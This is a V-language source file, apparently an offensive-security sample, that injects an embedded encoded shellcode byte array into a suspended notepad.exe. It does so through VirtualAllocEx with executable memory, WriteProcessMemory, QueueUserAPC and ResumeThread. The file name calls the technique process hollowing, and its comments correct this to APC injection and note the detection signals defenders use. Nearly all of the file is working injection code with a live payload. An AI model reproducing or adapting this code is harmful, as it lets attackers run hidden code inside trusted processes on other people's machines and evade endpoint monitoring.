2_processHollowing.v
module main
#flag -luser32
#flag -lkernel32
// V-side mirror of the Win32 PROCESS_INFORMATION struct that C.CreateProcessW
// fills in (main passes `&proc_info` to it). Field order and widths must match the
// Win32 definition, so the fields must not be reordered or retyped.
struct ProcessInformation {
mut:
h_process voidptr // handle to the created process; main uses it for VirtualAllocEx/WriteProcessMemory
h_thread voidptr // handle to the created process's primary thread; main uses it for QueueUserAPC/ResumeThread
dw_process_id u32 // process id (not read in this file)
dw_thread_id u32 // primary thread id (only referenced from a commented-out OpenThread call)
}
// V-side mirror of the Win32 STARTUPINFOW struct passed by pointer to
// C.CreateProcessW in main. Layout must match the Win32 definition exactly
// (same field order and sizes), so the fields must not be reordered.
// The wide-string pointers are &u16 because the W (UTF-16) API is used.
struct StartupInfo {
mut:
cb u32 // size of this struct in bytes; Win32 expects sizeof(STARTUPINFOW)
lp_reserved &u16
lp_desktop &u16
lp_title &u16
dw_x u32
dw_y u32
dw_x_size u32
dw_y_size u32
dw_x_count_chars u32
dw_y_count_chars u32
dw_fill_attributes u32
dw_flags u32 // STARTF_* bit flags; main sets STARTF_USESTDHANDLES
w_show_window u16
cb_reserved2 u16
lp_reserved2 &byte
h_std_input voidptr // only honoured by Win32 when dw_flags has STARTF_USESTDHANDLES
h_std_output voidptr
h_std_error voidptr
}
// Function-pointer aliases used in main to reinterpret a raw buffer address
// (the VirtualAllocEx result) as callable code before handing it to QueueUserAPC.
// Both use the same `fn(voidptr) voidptr` shape; the names follow the Win32 typedefs.
type PTHREAD_START_ROUTINE = fn(voidptr) voidptr
type PAPCFUNC = fn(voidptr) voidptr
// Win32 (kernel32) bindings used by main. Return types are declared only where main
// consumes them; several calls (WaitForSingleObject, WriteProcessMemory, QueueUserAPC,
// ResumeThread) are declared without a return value, so their results cannot be checked.
// NOTE(review): C.CreateProcessW and C.ExpandEnvironmentStringsW are called in main but
// are not declared here — presumably relying on the V compiler accepting undeclared
// C calls; confirm against the targeted V version.
fn C.ZeroMemory(voidptr, usize)
fn C.VirtualAlloc(voidptr, usize, u32, u32) voidptr
fn C.VirtualAllocEx(voidptr, voidptr, usize, u32, u32) voidptr // cross-process allocation; returns remote base address
fn C.WaitForSingleObject(voidptr, int)
fn C.WriteProcessMemory(voidptr, voidptr, voidptr, usize, voidptr) // cross-process write
fn C.QueueUserAPC(voidptr, voidptr, voidptr) // (routine, thread handle, data)
fn C.ResumeThread(voidptr)
fn C.OpenThread(u32, bool, u32) voidptr // declared but only referenced from a commented-out line
// Entry point. Spawns notepad.exe in a suspended state, allocates an executable
// buffer inside it, copies the `shellcode` bytes there and queues that address as
// an APC on the child's primary thread before resuming it.
// Despite the file name, nothing in this block unmaps or replaces the target's
// image: the visible technique is APC queueing into a suspended process, not
// hollowing.
// Defender's view: every step below is a cross-process Win32 call
// (CreateProcessW with CREATE_SUSPENDED, VirtualAllocEx with PAGE_EXECUTE_READWRITE,
// WriteProcessMemory, QueueUserAPC, ResumeThread) that endpoint telemetry commonly
// records; the chain as a whole, rather than any single call, is the detection signal.
// Only CreateProcessW's result is examined, and a failure there merely prints a
// message and falls through to the remaining calls.
fn main() {
// Opaque byte payload. Its content and purpose cannot be determined from this file.
shellcode := [
byte(0xda),0xc0,0xbf,0x66,0x3a,0x39,0xe5,0xd9,0x74,0x24,0xf4,0x5b,0x33,0xc9,0xb1
,0x31,0x31,0x7b,0x18,0x03,0x7b,0x18,0x83,0xeb,0x9a,0xd8,0xcc,0x19,0x8a,0x9f
,0x2f,0xe2,0x4a,0xc0,0xa6,0x07,0x7b,0xc0,0xdd,0x4c,0x2b,0xf0,0x96,0x01,0xc7
,0x7b,0xfa,0xb1,0x5c,0x09,0xd3,0xb6,0xd5,0xa4,0x05,0xf8,0xe6,0x95,0x76,0x9b
,0x64,0xe4,0xaa,0x7b,0x55,0x27,0xbf,0x7a,0x92,0x5a,0x32,0x2e,0x4b,0x10,0xe1
,0xdf,0xf8,0x6c,0x3a,0x6b,0xb2,0x61,0x3a,0x88,0x02,0x83,0x6b,0x1f,0x19,0xda
,0xab,0xa1,0xce,0x56,0xe2,0xb9,0x13,0x52,0xbc,0x32,0xe7,0x28,0x3f,0x93,0x36
,0xd0,0xec,0xda,0xf7,0x23,0xec,0x1b,0x3f,0xdc,0x9b,0x55,0x3c,0x61,0x9c,0xa1
,0x3f,0xbd,0x29,0x32,0xe7,0x36,0x89,0x9e,0x16,0x9a,0x4c,0x54,0x14,0x57,0x1a
,0x32,0x38,0x66,0xcf,0x48,0x44,0xe3,0xee,0x9e,0xcd,0xb7,0xd4,0x3a,0x96,0x6c
,0x74,0x1a,0x72,0xc2,0x89,0x7c,0xdd,0xbb,0x2f,0xf6,0xf3,0xa8,0x5d,0x55,0x99
,0x2f,0xd3,0xe3,0xef,0x30,0xeb,0xeb,0x5f,0x59,0xda,0x60,0x30,0x1e,0xe3,0xa2
,0x75,0xd0,0xa9,0xef,0xdf,0x79,0x74,0x7a,0x62,0xe4,0x87,0x50,0xa0,0x11,0x04
,0x51,0x58,0xe6,0x14,0x10,0x5d,0xa2,0x92,0xc8,0x2f,0xbb,0x76,0xef,0x9c,0xbc
,0x52,0x8c,0x43,0x2f,0x3e,0x7d,0xe6,0xd7,0xa5,0x81]
println('Creating a process')
// Create a process (notepad.exe)
// Null standard-handle placeholders; they are never opened or written to in this file.
mut child_stdin := &u32(0)
mut child_stdout_read := &u32(0)
mut child_stdout_write := &u32(0)
cmd := "notepad.exe"
// UTF-16 buffer for the expanded command line (32768 u16 = the 32767-char Win32 command-line limit plus NUL).
command_line := [32768]u16{}
proc_info := ProcessInformation{}
start_info := StartupInfo{
lp_reserved2: 0
lp_reserved: 0
lp_desktop: 0
lp_title: 0
cb: sizeof(C.PROCESS_INFORMATION)
h_std_input: child_stdin
h_std_output: child_stdout_write
h_std_error: child_stdout_write
dw_flags: u32(C.STARTF_USESTDHANDLES)
}
C.ZeroMemory(&start_info, sizeof(start_info))
C.ZeroMemory(&proc_info, sizeof(proc_info))
// Expand %VAR% references in `cmd` into the wide buffer that CreateProcessW consumes.
C.ExpandEnvironmentStringsW(cmd.to_wide(), voidptr(&command_line), 32768)
// CREATE_SUSPENDED 0x00000004 CREATE_NO_WINDOW 0x08000000
// The child starts with its primary thread suspended and no console window;
// a suspended process creation is itself a commonly monitored event.
create_process_ok := C.CreateProcessW(0, &command_line[0], 0, 0, C.FALSE, 0x00000004|0x08000000, 0, 0,
voidptr(&start_info), voidptr(&proc_info))
if create_process_ok == false {
println("Error to create a process")
}
// Waits on the process handle with a 2000 ms timeout. NOTE(review): a process handle
// signals on process exit, so for a suspended child this presumably just elapses.
C.WaitForSingleObject(proc_info.h_process, 2000)
hprocess := proc_info.h_process
hthread := proc_info.h_thread
// Allocation Memory and Write shellcode to the allocated buffer
println('Creating virtualAlloc')
//MEM_COMMIT 0x00001000 MEM_RESERVE 0x00002000
// PAGE_EXECUTE_READWRITE 0x40
//h_alloc := C.VirtualAlloc(voidptr(&hprocess), size_t(sizeof(shellcode)), 0x00001000|0x00002000, 0x40)
// Remote allocation in the child with RWX protection (0x40). The RWX page plus the
// cross-process write below is the classic memory-injection indicator for EDR/hunting.
h_alloc := C.VirtualAllocEx(hprocess, 0, usize(sizeof(shellcode)), 0x00001000|0x00002000, 0x40)
println('WriteProcessMemory')
// Copies `shellcode.len` bytes from this process into the remote buffer.
// The final 0 passes a null lpNumberOfBytesWritten, so the written count is not retrieved.
C.WriteProcessMemory(hprocess, h_alloc, shellcode.data, shellcode.len, 0)
// Inject into the suspended thread.
// Reinterpret the remote buffer address as a function pointer for the APC.
apc_routine := PTHREAD_START_ROUTINE(h_alloc)
//hthread2 := C.OpenThread(0x06010000, C.TRUE, proc_info.dw_thread_id)
// Queues the routine on the child's primary thread with a null context argument.
// Per Win32 semantics (not visible here) a user APC runs when the target thread next
// enters an alertable state; ResumeThread below lets the still-suspended thread get there.
C.QueueUserAPC(PAPCFUNC(apc_routine), hthread, 0)
// Resume the suspended thread
C.ResumeThread(hthread)
}